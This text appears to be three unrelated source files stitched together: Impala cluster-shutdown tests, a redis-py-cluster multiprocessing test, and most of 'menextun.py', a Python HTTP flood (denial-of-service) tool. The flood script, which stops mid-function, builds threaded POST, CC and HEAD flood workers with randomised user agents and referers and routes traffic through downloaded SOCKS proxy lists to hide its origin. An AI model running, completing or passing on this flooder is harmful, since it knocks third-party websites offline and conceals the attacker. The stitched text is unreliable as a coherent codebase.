@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--shutdown_grace_period_s={grace_period} \
--hostname={hostname}".format(grace_period=IDLE_SHUTDOWN_GRACE_PERIOD_S,
hostname=socket.gethostname()))
def test_shutdown_idle(self):
"""Test that idle impalads shut down in a timely manner after the shutdown grace
period elapses."""
impalad1 = psutil.Process(self.cluster.impalads[0].get_pid())
impalad2 = psutil.Process(self.cluster.impalads[1].get_pid())
impalad3 = psutil.Process(self.cluster.impalads[2].get_pid())
# Test that a failed shut down from a bogus host or port fails gracefully.
ex = self.execute_query_expect_failure(self.client,
":shutdown('e6c00ca5cd67b567eb96c6ecfb26f05')")
assert "Could not find IPv4 address for:" in str(ex)
ex = self.execute_query_expect_failure(self.client, ":shutdown('localhost:100000')")
assert "invalid port:" in str(ex)
assert ("This may be because the port specified is wrong.") not in str(ex)
# Test that pointing to the wrong thrift service (the HS2 port) fails gracefully-ish.
thrift_port = 21051 # HS2 port.
ex = self.execute_query_expect_failure(self.client,
":shutdown('localhost:{0}')".format(thrift_port))
assert ("failed with error 'RemoteShutdown() RPC failed") in str(ex)
assert ("This may be because the port specified is wrong.") in str(ex)
# Test RPC error handling with debug action.
ex = self.execute_query_expect_failure(self.client, ":shutdown('localhost:27001')",
query_options={'debug_action': 'CRS_SHUTDOWN_RPC:FAIL'})
assert 'Rpc to 127.0.0.1:27001 failed with error \'Debug Action: ' \
'CRS_SHUTDOWN_RPC:FAIL' in str(ex)
# Test remote shutdown.
LOG.info("Start remote shutdown {0}".format(time.time()))
self.execute_query_expect_success(self.client, ":shutdown('localhost:27001')",
query_options={})
# Remote shutdown does not require statestore.
self.cluster.statestored.kill()
self.cluster.statestored.wait_for_exit()
self.execute_query_expect_success(self.client, ":shutdown('localhost:27002')",
query_options={})
# Test local shutdown, which should succeed even with injected RPC error.
LOG.info("Start local shutdown {0}".format(time.time()))
self.execute_query_expect_success(self.client,
":shutdown('{0}:27000')".format(socket.gethostname()),
query_options={'debug_action': 'CRS_SHUTDOWN_RPC:FAIL'})
# Make sure that the impala daemons exit after the shutdown grace period plus a 10
# second margin of error.
start_time = time.time()
LOG.info("Waiting for impalads to exit {0}".format(start_time))
impalad1.wait()
LOG.info("First impalad exited {0}".format(time.time()))
impalad2.wait()
LOG.info("Second impalad exited {0}".format(time.time()))
impalad3.wait()
LOG.info("Third impalad exited {0}".format(time.time()))
shutdown_duration = time.time() - start_time
assert shutdown_duration <= self.IDLE_SHUTDOWN_GRACE_PERIOD_S + 10
EXEC_SHUTDOWN_GRACE_PERIOD_S = 5
EXEC_SHUTDOWN_DEADLINE_S = 10
@pytest.mark.execute_serially
@SkipIfNotHdfsMinicluster.scheduling
@CustomClusterTestSuite.with_args(
impalad_args="--shutdown_grace_period_s={grace_period} \
--shutdown_deadline_s={deadline} \
--hostname={hostname}".format(grace_period=EXEC_SHUTDOWN_GRACE_PERIOD_S,
deadline=EXEC_SHUTDOWN_DEADLINE_S, hostname=socket.gethostname()))
def test_shutdown_executor(self):
self.do_test_shutdown_executor(fetch_delay_s=0)
@pytest.mark.execute_serially
@SkipIfNotHdfsMinicluster.scheduling
@CustomClusterTestSuite.with_args(
impalad_args="--shutdown_grace_period_s={grace_period} \
--shutdown_deadline_s={deadline} \
--stress_status_report_delay_ms={status_report_delay_ms} \
--hostname={hostname}".format(grace_period=EXEC_SHUTDOWN_GRACE_PERIOD_S,
deadline=EXEC_SHUTDOWN_DEADLINE_S, status_report_delay_ms=5000,
hostname=socket.gethostname()))
def test_shutdown_executor_with_delay(self):
"""Regression test for IMPALA-7931 that adds delays to status reporting and
to fetching of results to trigger races that previously resulted in query failures."""
print self.exploration_strategy
if self.exploration_strategy() != 'exhaustive':
pytest.skip()
self.do_test_shutdown_executor(fetch_delay_s=5)
def do_test_shutdown_executor(self, fetch_delay_s):
"""Implementation of test that shuts down and then restarts an executor. This should
not disrupt any queries that start after the shutdown or complete before the shutdown
time limit. The test is parameterized by 'fetch_delay_s', the amount to delay before
fetching from the query that must survive shutdown of an executor."""
# Add sleeps to make sure that the query takes a couple of seconds to execute on the
# executors.
QUERY = "select count(*) from functional_parquet.alltypes where sleep(1) = bool_col"
# Subtle: use a splittable file format like text for lineitem so that each backend
# is guaranteed to get scan ranges that contain some actual rows. With Parquet on
# S3, the files get broken into 32MB scan ranges and a backend might get unlucky
# and only get scan ranges that don't contain the midpoint of any row group, and
# therefore not actually produce any rows.
SLOW_QUERY = "select count(*) from tpch.lineitem where sleep(1) = l_orderkey"
SHUTDOWN_EXEC2 = ": shutdown('localhost:27001')"
# Run this query before shutdown and make sure that it executes successfully on
# all executors through the shutdown grace period without disruption.
before_shutdown_handle = self.__exec_and_wait_until_running(QUERY)
# Run this query which simulates getting stuck in admission control until after
# the shutdown grace period expires. This demonstrates that queries don't get
# cancelled if the cluster membership changes while they're waiting for admission.
before_shutdown_admission_handle = self.execute_query_async(QUERY,
{'debug_action': 'AC_BEFORE_ADMISSION:SLEEP@30000'})
# Shut down and wait for the shutdown state to propagate through statestore.
result = self.execute_query_expect_success(self.client, SHUTDOWN_EXEC2)
assert parse_shutdown_result(result) == (
"{0}s000ms".format(self.EXEC_SHUTDOWN_GRACE_PERIOD_S),
"{0}s000ms".format(self.EXEC_SHUTDOWN_DEADLINE_S), "0", "1")
# Check that the status is reflected on the debug page.
web_json = self.cluster.impalads[1].service.get_debug_webpage_json("")
assert web_json.get('is_quiescing', None) is True, web_json
assert 'shutdown_status' in web_json, web_json
self.impalad_test_service.wait_for_num_known_live_backends(2,
timeout=self.EXEC_SHUTDOWN_GRACE_PERIOD_S + 5, interval=0.2,
include_shutting_down=False)
# Run another query, which shouldn't get scheduled on the new executor. We'll let
# this query continue running through the full shutdown and restart cycle.
after_shutdown_handle = self.__exec_and_wait_until_running(QUERY)
# Wait for the impalad to exit, then start it back up and run another query, which
# should be scheduled on it again.
self.cluster.impalads[1].wait_for_exit()
# Finish fetching results from the first query (which will be buffered on the
# coordinator) after the backend exits. Add a delay before fetching to ensure
# that the query is not torn down on the coordinator when the failure is
# detected by the statestore (see IMPALA-7931).
assert self.__fetch_and_get_num_backends(
QUERY, before_shutdown_handle, delay_s=fetch_delay_s) == 3
# Confirm that the query stuck in admission succeeded.
assert self.__fetch_and_get_num_backends(
QUERY, before_shutdown_admission_handle, timeout_s=30) == 2
# Start the impalad back up and run another query, which should be scheduled on it
# again.
self.cluster.impalads[1].start()
self.impalad_test_service.wait_for_num_known_live_backends(
3, timeout=30, interval=0.2, include_shutting_down=False)
after_restart_handle = self.__exec_and_wait_until_running(QUERY)
# The query started while the backend was shut down should not run on that backend.
assert self.__fetch_and_get_num_backends(QUERY, after_shutdown_handle) == 2
assert self.__fetch_and_get_num_backends(QUERY, after_restart_handle) == 3
# Test that a query will fail when the executor shuts down after the limit.
deadline_expiry_handle = self.__exec_and_wait_until_running(SLOW_QUERY)
result = self.execute_query_expect_success(self.client, SHUTDOWN_EXEC2)
assert parse_shutdown_result(result) == (
"{0}s000ms".format(self.EXEC_SHUTDOWN_GRACE_PERIOD_S),
"{0}s000ms".format(self.EXEC_SHUTDOWN_DEADLINE_S), "0", "1")
self.cluster.impalads[1].wait_for_exit()
self.__check_deadline_expired(SLOW_QUERY, deadline_expiry_handle)
# Test that we can reduce the deadline after setting it to a high value.
# Run a query that will fail as a result of the reduced deadline.
deadline_expiry_handle = self.__exec_and_wait_until_running(SLOW_QUERY)
SHUTDOWN_EXEC3 = ": shutdown('localhost:27002', {0})"
VERY_HIGH_DEADLINE = 5000
HIGH_DEADLINE = 1000
LOW_DEADLINE = 5
result = self.execute_query_expect_success(
self.client, SHUTDOWN_EXEC3.format(HIGH_DEADLINE))
grace, deadline, _, _ = parse_shutdown_result(result)
assert grace == "{0}s000ms".format(self.EXEC_SHUTDOWN_GRACE_PERIOD_S)
assert deadline == "{0}m{1}s".format(HIGH_DEADLINE / 60, HIGH_DEADLINE % 60)
result = self.execute_query_expect_success(
self.client, SHUTDOWN_EXEC3.format(VERY_HIGH_DEADLINE))
_, deadline, _, _ = parse_shutdown_result(result)
LOG.info("Deadline is {0}".format(deadline))
min_string, sec_string = re.match("([0-9]*)m([0-9]*)s", deadline).groups()
assert int(min_string) * 60 + int(sec_string) <= HIGH_DEADLINE, \
"Cannot increase deadline " + deadline
result = self.execute_query_expect_success(
self.client, SHUTDOWN_EXEC3.format(LOW_DEADLINE))
_, deadline, _, queries_executing = parse_shutdown_result(result)
assert deadline == "{0}s000ms".format(LOW_DEADLINE)
assert int(queries_executing) > 0, "Slow query should still be running."
self.cluster.impalads[2].wait_for_exit()
self.__check_deadline_expired(SLOW_QUERY, deadline_expiry_handle)
COORD_SHUTDOWN_GRACE_PERIOD_S = 5
COORD_SHUTDOWN_DEADLINE_S = 120
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--shutdown_grace_period_s={grace_period} \
--shutdown_deadline_s={deadline} \
--hostname={hostname}".format(
grace_period=COORD_SHUTDOWN_GRACE_PERIOD_S,
deadline=COORD_SHUTDOWN_DEADLINE_S, hostname=socket.gethostname()),
default_query_options=[("num_scanner_threads", "1")])
@needs_session(TCLIService.TProtocolVersion.HIVE_CLI_SERVICE_PROTOCOL_V6,
close_session=False)
def test_shutdown_coordinator(self):
"""Test that shuts down the coordinator. Running queries should finish but new
requests should be rejected."""
# Start a query running. This should complete successfully and keep the coordinator
# up until it finishes. We set NUM_SCANNER_THREADS=1 above to make the runtime more
# predictable.
SLOW_QUERY = """select * from tpch_parquet.lineitem where sleep(1) < l_orderkey"""
SHUTDOWN = ": shutdown()"
SHUTDOWN_ERROR_PREFIX = 'Server is being shut down:'
before_shutdown_handle = self.__exec_and_wait_until_running(SLOW_QUERY)
before_shutdown_hs2_handle = self.execute_statement(SLOW_QUERY).operationHandle
# Shut down the coordinator. Operations that start after this point should fail.
result = self.execute_query_expect_success(self.client, SHUTDOWN)
grace, deadline, registered, _ = parse_shutdown_result(result)
assert grace == "{0}s000ms".format(self.COORD_SHUTDOWN_GRACE_PERIOD_S)
assert deadline == "{0}m".format(self.COORD_SHUTDOWN_DEADLINE_S / 60), "4"
assert registered == "3"
# Expect that the beeswax shutdown error occurs when calling fn()
def expect_beeswax_shutdown_error(fn):
try:
fn()
except ImpalaBeeswaxException, e:
assert SHUTDOWN_ERROR_PREFIX in str(e)
expect_beeswax_shutdown_error(lambda: self.client.execute("select 1"))
expect_beeswax_shutdown_error(lambda: self.client.execute_async("select 1"))
# Test that the HS2 shutdown error occurs for various HS2 operations.
self.execute_statement("select 1", None, TCLIService.TStatusCode.ERROR_STATUS,
SHUTDOWN_ERROR_PREFIX)
def check_hs2_shutdown_error(hs2_response):
HS2TestSuite.check_response(hs2_response, TCLIService.TStatusCode.ERROR_STATUS,
SHUTDOWN_ERROR_PREFIX)
check_hs2_shutdown_error(self.hs2_client.OpenSession(TCLIService.TOpenSessionReq()))
check_hs2_shutdown_error(self.hs2_client.GetInfo(TCLIService.TGetInfoReq(
self.session_handle, TCLIService.TGetInfoType.CLI_MAX_DRIVER_CONNECTIONS)))
check_hs2_shutdown_error(self.hs2_client.GetTypeInfo(
TCLIService.TGetTypeInfoReq(self.session_handle)))
check_hs2_shutdown_error(self.hs2_client.GetCatalogs(
TCLIService.TGetCatalogsReq(self.session_handle)))
check_hs2_shutdown_error(self.hs2_client.GetSchemas(
TCLIService.TGetSchemasReq(self.session_handle)))
check_hs2_shutdown_error(self.hs2_client.GetTables(
TCLIService.TGetTablesReq(self.session_handle)))
check_hs2_shutdown_error(self.hs2_client.GetTableTypes(
TCLIService.TGetTableTypesReq(self.session_handle)))
check_hs2_shutdown_error(self.hs2_client.GetColumns(
TCLIService.TGetColumnsReq(self.session_handle)))
check_hs2_shutdown_error(self.hs2_client.GetFunctions(
TCLIService.TGetFunctionsReq(self.session_handle, functionName="")))
# Operations on running HS2 query still work.
self.fetch_until(before_shutdown_hs2_handle,
TCLIService.TFetchOrientation.FETCH_NEXT, 10)
HS2TestSuite.check_response(self.hs2_client.CancelOperation(
TCLIService.TCancelOperationReq(before_shutdown_hs2_handle)))
HS2TestSuite.check_response(self.hs2_client.CloseOperation(
TCLIService.TCloseOperationReq(before_shutdown_hs2_handle)))
# Make sure that the beeswax query is still executing, then close it to allow the
# coordinator to shut down.
self.impalad_test_service.wait_for_query_state(self.client, before_shutdown_handle,
self.client.QUERY_STATES['FINISHED'], timeout=20)
self.client.close_query(before_shutdown_handle)
self.cluster.impalads[0].wait_for_exit()
def __exec_and_wait_until_running(self, query, timeout=20):
"""Execute 'query' with self.client and wait until it is in the RUNNING state.
'timeout' controls how long we will wait"""
# Fix number of scanner threads to make runtime more deterministic.
handle = self.execute_query_async(query, {'num_scanner_threads': 1})
self.impalad_test_service.wait_for_query_state(self.client, handle,
self.client.QUERY_STATES['RUNNING'], timeout=20)
return handle
def __fetch_and_get_num_backends(self, query, handle, delay_s=0, timeout_s=20):
"""Fetch the results of 'query' from the beeswax handle 'handle', close the
query and return the number of backends obtained from the profile."""
self.impalad_test_service.wait_for_query_state(self.client, handle,
self.client.QUERY_STATES['FINISHED'], timeout=timeout_s)
if delay_s > 0:
LOG.info("sleeping for {0}s".format(delay_s))
time.sleep(delay_s)
self.client.fetch(query, handle)
profile = self.client.get_runtime_profile(handle)
self.client.close_query(handle)
backends_match = re.search("NumBackends: ([0-9]*)", profile)
assert backends_match is not None, profile
return int(backends_match.group(1))
def __check_deadline_expired(self, query, handle):
"""Check that the query with 'handle' fails because of a backend hitting the
deadline and shutting down."""
try:
self.client.fetch(query, handle)
assert False, "Expected query to fail"
except Exception, e:
assert 'Failed due to unreachable impalad(s)' in str(e)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--shutdown_grace_period_s={grace_period} \
--hostname={hostname}".format(grace_period=IDLE_SHUTDOWN_GRACE_PERIOD_S,
hostname=socket.gethostname()), cluster_size=1)
def test_shutdown_signal(self):
"""Test that an idle impalad shuts down in a timely manner after the shutdown grace
period elapses."""
impalad = psutil.Process(self.cluster.impalads[0].get_pid())
    LOG.info(
        "Sending IMPALA_SHUTDOWN_SIGNAL(SIGRTMIN = {0}) signal to impalad PID = {1}"
        .format(self.IMPALA_SHUTDOWN_SIGNAL, impalad.pid))
impalad.send_signal(self.IMPALA_SHUTDOWN_SIGNAL)
# Make sure that the impala daemon exits after the shutdown grace period plus a 10
# second margin of error.
start_time = time.time()
LOG.info("Waiting for impalad to exit {0}".format(start_time))
impalad.wait()
shutdown_duration = time.time() - start_time
assert shutdown_duration <= self.IDLE_SHUTDOWN_GRACE_PERIOD_S + 10
# Make sure signal was received and the grace period and deadline are as expected.
self.assert_impalad_log_contains('INFO',
"Shutdown signal received. Current Shutdown Status: shutdown grace period left: "
"{0}s000ms, deadline left: 8760h".format(self.IDLE_SHUTDOWN_GRACE_PERIOD_S))
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(cluster_size=1)
def test_sending_multiple_shutdown_signals(self):
"""Test that multiple IMPALA_SHUTDOWN_SIGNAL signals are all handeled without
crashing the process."""
impalad = psutil.Process(self.cluster.impalads[0].get_pid())
NUM_SIGNALS_TO_SEND = 10
    LOG.info(
        "Sending {0} IMPALA_SHUTDOWN_SIGNAL(SIGRTMIN = {1}) signals to impalad PID = {2}"
        .format(NUM_SIGNALS_TO_SEND, self.IMPALA_SHUTDOWN_SIGNAL, impalad.pid))
for i in range(NUM_SIGNALS_TO_SEND):
impalad.send_signal(self.IMPALA_SHUTDOWN_SIGNAL)
# Give shutdown thread some time to wake up and handle all the signals to avoid
# flakiness.
sleep(5)
# Make sure all signals were received and the process is still up.
self.assert_impalad_log_contains('INFO', "Shutdown signal received.",
NUM_SIGNALS_TO_SEND)
assert impalad.is_running(), "Impalad process should still be running."
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--shutdown_grace_period_s={grace_period} \
--hostname={hostname}".format(grace_period=IDLE_SHUTDOWN_GRACE_PERIOD_S,
hostname=socket.gethostname()), cluster_size=1)
def test_graceful_shutdown_script(self):
impalad = psutil.Process(self.cluster.impalads[0].get_pid())
script = os.path.join(os.environ['IMPALA_HOME'], 'bin',
'graceful_shutdown_backends.sh')
start_time = time.time()
check_call([script, str(self.IDLE_SHUTDOWN_GRACE_PERIOD_S)])
LOG.info("Waiting for impalad to exit {0}".format(start_time))
impalad.wait()
shutdown_duration = time.time() - start_time
assert shutdown_duration <= self.IDLE_SHUTDOWN_GRACE_PERIOD_S + 10
|
test_multiprocessing.py
|
import pytest
import multiprocessing
import contextlib
import redis
from rediscluster.connection import ClusterConnection, ClusterConnectionPool
from redis.exceptions import ConnectionError
from .conftest import _get_client
@contextlib.contextmanager
def exit_callback(callback, *args):
try:
yield
finally:
callback(*args)
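# Usage note: exit_callback(pool.release, conn) runs pool.release(conn) when the
# with-block exits, so a borrowed connection is returned to the pool even when an
# assertion inside the block fails.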
class TestMultiprocessing(object):
# Test connection sharing between forks.
# See issue #1085 for details.
# use a multi-connection client as that's the only type that is
    # actually fork/process-safe
@pytest.fixture()
def r(self, request):
return _get_client(
redis.Redis,
request=request,
single_connection_client=False)
def test_close_connection_in_child(self):
"""
A connection owned by a parent and closed by a child doesn't
destroy the file descriptors so a parent can still use it.
"""
conn = ClusterConnection(port=7000)
conn.send_command('ping')
assert conn.read_response() == b'PONG'
def target(conn):
conn.send_command('ping')
assert conn.read_response() == b'PONG'
conn.disconnect()
proc = multiprocessing.Process(target=target, args=(conn,))
proc.start()
proc.join(3)
assert proc.exitcode == 0
# The connection was created in the parent but disconnected in the
# child. The child called socket.close() but did not call
# socket.shutdown() because it wasn't the "owning" process.
# Therefore the connection still works in the parent.
conn.send_command('ping')
assert conn.read_response() == b'PONG'
def test_close_connection_in_parent(self):
"""
A connection owned by a parent is unusable by a child if the parent
(the owning process) closes the connection.
"""
conn = ClusterConnection(port=7000)
conn.send_command('ping')
assert conn.read_response() == b'PONG'
def target(conn, ev):
ev.wait()
# the parent closed the connection. because it also created the
# connection, the connection is shutdown and the child
# cannot use it.
with pytest.raises(ConnectionError):
conn.send_command('ping')
ev = multiprocessing.Event()
proc = multiprocessing.Process(target=target, args=(conn, ev))
proc.start()
conn.disconnect()
ev.set()
proc.join(3)
assert proc.exitcode == 0
@pytest.mark.parametrize('max_connections', [1, 2, None])
def test_pool(self, max_connections):
"""
A child will create its own connections when using a pool created
by a parent.
"""
pool = ClusterConnectionPool.from_url('redis://localhost:7000',
max_connections=max_connections)
conn = pool.get_random_connection()
main_conn_pid = conn.pid
with exit_callback(pool.release, conn):
conn.send_command('ping')
assert conn.read_response() == b'PONG'
def target(pool):
with exit_callback(pool.disconnect):
conn = pool.get_random_connection()
assert conn.pid != main_conn_pid
with exit_callback(pool.release, conn):
assert conn.send_command('ping') is None
assert conn.read_response() == b'PONG'
proc = multiprocessing.Process(target=target, args=(pool,))
proc.start()
proc.join(3)
assert proc.exitcode == 0
# Check that connection is still alive after fork process has exited
# and disconnected the connections in its pool
conn = pool.get_random_connection()
with exit_callback(pool.release, conn):
assert conn.send_command('ping') is None
assert conn.read_response() == b'PONG'
@pytest.mark.parametrize('max_connections', [1, 2, None])
def test_close_pool_in_main(self, max_connections):
"""
A child process that uses the same pool as its parent isn't affected
when the parent disconnects all connections within the pool.
"""
pool = ClusterConnectionPool.from_url('redis://localhost:7000',
max_connections=max_connections)
conn = pool.get_random_connection()
assert conn.send_command('ping') is None
assert conn.read_response() == b'PONG'
def target(pool, disconnect_event):
conn = pool.get_random_connection()
with exit_callback(pool.release, conn):
assert conn.send_command('ping') is None
assert conn.read_response() == b'PONG'
disconnect_event.wait()
assert conn.send_command('ping') is None
assert conn.read_response() == b'PONG'
ev = multiprocessing.Event()
proc = multiprocessing.Process(target=target, args=(pool, ev))
proc.start()
pool.disconnect()
ev.set()
proc.join(3)
assert proc.exitcode == 0
def test_redis_client(self, r):
"A redis client created in a parent can also be used in a child"
assert r.ping() is True
def target(client):
assert client.ping() is True
del client
proc = multiprocessing.Process(target=target, args=(r,))
proc.start()
proc.join(3)
assert proc.exitcode == 0
assert r.ping() is True
|
menextun.py
|
#!/usr/bin/python3
#Coded by ViRu
#########################################
# Just a little change #
# -- ViRu #
#########################################
import requests
import socket
import socks
import time
import random
import threading
import sys
import ssl
import datetime
import base64
import codecs
print ('''\033[92m
┌────────────────────────────────────────────────────────────────────────────┐
│ __ __ _____ _ _ _______ _______ _ _ _ _ │
│ | \/ | ____| \ | | ____\ \/ /_ _| | | | \ | | │
│ | |\/| | _| | \| | _| \ / | | | | | | \| | │
│ | | | | |___| |\ | |___ / \ | | | |_| | |\ | │
│ |_| |_|_____|_| \_|_____/_/\_\ |_| \___/|_| \_| │
│ C0d3d by ViRu │
│────────────────────────────────────────────────────────────────────────────│
│ Don't attack .gov website │
└────────────────────────────────────────────────────────────────────────────┘
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××\033[0m''')
acceptall = [
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept-Encoding: gzip, deflate\r\n",
"Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n",
"Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n",
"Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n,"
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xhtml+xml",
"Accept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n",
"Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",]
referers = [
"https://www.google.com/search?q=",
"https://check-host.net/",
"https://www.facebook.com/",
"https://www.youtube.com/",
"https://www.fbi.com/",
"https://www.bing.com/search?q=",
"https://r.search.yahoo.com/",
"https://www.cia.gov/index.html",
"https://vk.com/profile.php?redirect=",
"https://www.usatoday.com/search/results?q=",
"https://help.baidu.com/searchResult?keywords=",
"https://steamcommunity.com/market/search?q=",
"https://www.ted.com/search?q=",
"https://play.google.com/store/search?q=",
"https://www.qwant.com/search?q=",
"https://soda.demo.socrata.com/resource/4tka-6guv.json?$q=",
"https://www.google.ad/search?q=",
"https://www.google.ae/search?q=",
"https://www.google.com.af/search?q=",
"https://www.google.com.ag/search?q=",
"https://www.google.com.ai/search?q=",
"https://www.google.al/search?q=",
"https://www.google.am/search?q=",
"https://www.google.co.ao/search?q=",
]
ind_dict = {}
data = ""
cookies = ""
strings = "asdfghjklqwertyuiopZXCVBNMQWERTYUIOPASDFGHJKLzxcvbnm1234567890&"
###################################################
Intn = random.randint
Choice = random.choice
###################################################
def build_threads(mode,thread_num,event,socks_type,ind_rlock):
if mode == "post":
for _ in range(thread_num):
th = threading.Thread(target = post,args=(event,socks_type,ind_rlock,))
th.setDaemon(True)
th.start()
elif mode == "cc":
for _ in range(thread_num):
th = threading.Thread(target = cc,args=(event,socks_type,ind_rlock,))
th.setDaemon(True)
th.start()
elif mode == "head":
for _ in range(thread_num):
th = threading.Thread(target = head,args=(event,socks_type,ind_rlock,))
th.setDaemon(True)
th.start()
def getuseragent():
platform = Choice(['Macintosh', 'Windows', 'X11'])
if platform == 'Macintosh':
os = Choice(['68K', 'PPC', 'Intel Mac OS X'])
elif platform == 'Windows':
os = Choice(['Win3.11', 'WinNT3.51', 'WinNT4.0', 'Windows NT 5.0', 'Windows NT 5.1', 'Windows NT 5.2', 'Windows NT 6.0', 'Windows NT 6.1', 'Windows NT 6.2', 'Win 9x 4.90', 'WindowsCE', 'Windows XP', 'Windows 7', 'Windows 8', 'Windows NT 10.0; Win64; x64'])
elif platform == 'X11':
os = Choice(['Linux i686', 'Linux x86_64'])
browser = Choice(['chrome', 'firefox', 'ie'])
if browser == 'chrome':
webkit = str(Intn(500, 599))
version = str(Intn(0, 99)) + '.0' + str(Intn(0, 9999)) + '.' + str(Intn(0, 999))
return 'Mozilla/5.0 (' + os + ') AppleWebKit/' + webkit + '.0 (KHTML, like Gecko) Chrome/' + version + ' Safari/' + webkit
elif browser == 'firefox':
currentYear = datetime.date.today().year
year = str(Intn(2020, currentYear))
month = Intn(1, 12)
if month < 10:
month = '0' + str(month)
else:
month = str(month)
day = Intn(1, 30)
if day < 10:
day = '0' + str(day)
else:
day = str(day)
gecko = year + month + day
version = str(Intn(1, 72)) + '.0'
return 'Mozilla/5.0 (' + os + '; rv:' + version + ') Gecko/' + gecko + ' Firefox/' + version
elif browser == 'ie':
version = str(Intn(1, 99)) + '.0'
engine = str(Intn(1, 99)) + '.0'
option = Choice([True, False])
if option == True:
token = Choice(['.NET CLR', 'SV1', 'Tablet PC', 'Win64; IA64', 'Win64; x64', 'WOW64']) + '; '
else:
token = ''
return 'Mozilla/5.0 (compatible; MSIE ' + version + '; ' + os + '; ' + token + 'Trident/' + engine + ')'
def randomurl():
return str(Choice(strings)+str(Intn(0,271400281257))+Choice(strings)+str(Intn(0,271004281257))+Choice(strings) + Choice(strings)+str(Intn(0,271400281257))+Choice(strings)+str(Intn(0,271004281257))+Choice(strings))
def GenReqHeader(method):
global data
header = ""
if method == "get" or method == "head":
connection = "Connection: Keep-Alive\r\n"
if cookies != "":
connection += "Cookies: "+str(cookies)+"\r\n"
accept = Choice(acceptall)
referer = "Referer: "+Choice(referers)+ target + path + "\r\n"
useragent = "User-Agent: " + getuseragent() + "\r\n"
header = referer + useragent + accept + connection + "\r\n"
elif method == "post":
post_host = "POST " + path + " HTTP/1.1\r\nHost: " + target + "\r\n"
content = "Content-Type: application/x-www-form-urlencoded\r\nX-requested-with:XMLHttpRequest\r\n"
refer = "Referer: http://"+ target + path + "\r\n"
user_agent = "User-Agent: " + getuseragent() + "\r\n"
accept = Choice(acceptall)
if mode2 != "y":# You can enable customize data
data = str(random._urandom(16))
length = "Content-Length: "+str(len(data))+" \r\nConnection: Keep-Alive\r\n"
if cookies != "":
length += "Cookies: "+str(cookies)+"\r\n"
header = post_host + accept + refer + content + user_agent + length + "\n" + data + "\r\n\r\n"
return header
def ParseUrl(original_url):
global target
global path
global port
global protocol
original_url = original_url.strip()
url = ""
path = "/"#default value
port = 80 #default value
protocol = "http"
#http(s)://www.example.com:1337/xxx
if original_url[:7] == "http://":
url = original_url[7:]
elif original_url[:8] == "https://":
url = original_url[8:]
protocol = "https"
#http(s)://www.example.com:1337/xxx ==> www.example.com:1337/xxx
#print(url) #for debug
tmp = url.split("/")
website = tmp[0]#www.example.com:1337/xxx ==> www.example.com:1337
check = website.split(":")
if len(check) != 1:#detect the port
port = int(check[1])
else:
if protocol == "https":
port = 443
target = check[0]
if len(tmp) > 1:
path = url.replace(website,"",1)#get the path www.example.com/xxx ==> /xxx
def InputOption(question,options,default):
ans = ""
while ans == "":
ans = str(input(question)).strip().lower()
if ans == "":
ans = default
elif ans not in options:
print("> Please enter the correct option")
ans = ""
continue
return ans
def CheckerOption():
global proxies
N = str(input("> Do you need to get socks list?(y/n,default=y):"))
if N == 'y' or N == "" :
downloadsocks(choice)
else:
pass
if choice == "4":
out_file = str(input("> Socks4 Proxy file path(socks4.txt):"))
if out_file == '':
out_file = str("socks4.txt")
else:
out_file = str(out_file)
check_list(out_file)
proxies = open(out_file).readlines()
elif choice == "5":
out_file = str(input("> Socks5 Proxy file path(socks5.txt):"))
if out_file == '':
out_file = str("socks5.txt")
else:
out_file = str(out_file)
check_list(out_file)
proxies = open(out_file).readlines()
if len(proxies) == 0:
print("> There are no more proxies. Please download a new one.")
sys.exit(1)
print ("> Number Of Socks%s Proxies: %s" %(choice,len(proxies)))
time.sleep(0.03)
ans = str(input("> Do u need to check the socks list?(y/n, defualt=y):"))
if ans == "":
ans = "y"
if ans == "y":
ms = str(input("> Delay of socks(seconds, default=5):"))
if ms == "":
ms = int(5)
else :
try:
ms = int(ms)
except :
ms = float(ms)
check_socks(ms)
def SetupIndDict():
global ind_dict
for proxy in proxies:
ind_dict[proxy.strip()] = 0
def OutputToScreen(ind_rlock):
global ind_dict
i = 0
sp_char = ["|","/","-","\\"]
while 1:
if i > 3:
